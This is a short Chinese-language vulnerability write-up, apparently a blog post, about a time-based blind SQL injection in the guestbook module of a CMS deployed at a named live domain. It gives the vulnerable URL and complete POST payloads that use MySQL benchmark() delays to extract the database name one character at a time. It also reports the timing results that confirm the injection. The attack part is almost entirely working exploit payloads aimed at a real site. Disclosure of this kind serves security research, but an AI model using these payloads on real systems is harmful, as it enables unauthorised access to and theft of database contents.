释放双眼,带上耳机,听听看~!
本地测试的使用大众版本app/?app=guestbook&controller=index&action=index后来简单的测试了媒体版本,发现网址是 http://app.aspmpsx.com/?app=guestbook&controller=index&action=inde
本地测试的使用大众版本
app/?app=guestbook&controller=index&action=index
后来简单的测试了媒体版本,发现网址是
http://app.aspmpsx.com/?app=guestbook&controller=index&action=index
这种的居多。
漏洞位于:
http://www.aspmpsx.com/app/?app=guestbook&controller=index&action=index
漏洞利用:
测试的时候,因为注册了个用户,才提交的。
我的库名cmstop第一个字符是c,所以ascii码是99 ,用火狐提交 如下数据
POST URL http://www.aspmpsx.com/app/?app=guestbook&controller=index&action=add
POST DATA: typeid=2 and (select 1=1 union select if(substring(current,1,1)=char(99),benchmark(1500000000,encode(char(39,109,115,103,39),char(39,98,121,32,53,32,115,101,99,111,110,100,115,39))),null) from (select database() as current) as tbl ) #&title=1111111111111111'&content=11111111111%27&username=admin'&seccode=t8j8&=%E6%8F%90+%E4%BA%A4
提交如上的数据,返回的时间比较长
提交
typeid=2 and (select 1=1 union select if(substring(current,1,1)=char(991),benchmark(1500000000,encode(char(39,109,115,103,39),char(39,98,121,32,53,32,115,101,99,111,110,100,115,39))),null) from (select database() as current) as tbl ) #&title=1111111111111111'&content=11111111111%27&username=admin'&seccode=t8j8&=%E6%8F%90+%E4%BA%A4
很快就返回了,证明盲注成功。